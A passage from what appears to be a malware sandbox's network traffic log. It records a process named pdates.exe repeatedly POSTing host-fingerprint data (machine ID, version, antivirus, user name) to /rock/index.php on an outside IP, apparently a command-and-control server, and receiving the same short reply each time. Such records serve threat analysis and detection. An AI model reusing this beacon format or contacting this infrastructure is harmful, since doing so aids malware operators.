13	192.168.2.5	49729	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:05.574759960 CEST	2846	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:05.624429941 CEST	2846	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.5	49847	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:38.454371929 CEST	2971	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:38.503401995 CEST	2972	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.5	49848	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:38.669687986 CEST	2972	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:38.717765093 CEST	2972	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.5	49849	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:38.892254114 CEST	2973	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:38.941349030 CEST	2973	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.5	49850	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:39.133259058 CEST	2974	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:39.181709051 CEST	2974	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.5	49851	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:39.352269888 CEST	2975	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:39.402165890 CEST	2975	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.5	49852	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:39.601746082 CEST	2976	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:39.649926901 CEST	2976	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.5	49853	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:39.833369017 CEST	2977	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:39.881984949 CEST	2977	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.5	49855	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:40.061626911 CEST	2979	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:40.109918118 CEST	2979	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.5	49856	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:40.273636103 CEST	2980	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:40.321970940 CEST	2980	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.5	49857	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:40.489109039 CEST	2980	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:40.538098097 CEST	2981	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49730	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:05.846432924 CEST	2847	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:05.897316933 CEST	2847	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.5	49858	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:40.705246925 CEST	2985	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:40.752846956 CEST	2986	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.5	49859	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:40.981142044 CEST	2986	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:41.029234886 CEST	2986	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.5	49860	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:41.193057060 CEST	2987	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:41.241466045 CEST	2988	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.5	49861	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:41.399019003 CEST	2988	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:41.448220015 CEST	2989	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.5	49862	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:41.602068901 CEST	3022	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:41.650209904 CEST	3022	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.5	49863	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:41.813832998 CEST	3072	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:41.862087011 CEST	3072	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.5	49864	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:42.026441097 CEST	3171	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:42.075756073 CEST	3367	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.5	49865	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:42.239069939 CEST	3563	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:42.287623882 CEST	3563	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.5	49866	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:42.511549950 CEST	3706	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:42.560585022 CEST	3706	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.5	49867	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:42.718657970 CEST	3707	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:42.767620087 CEST	3707	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49731	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:06.061439991 CEST	2848	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:06.110831976 CEST	2848	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.5	49868	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
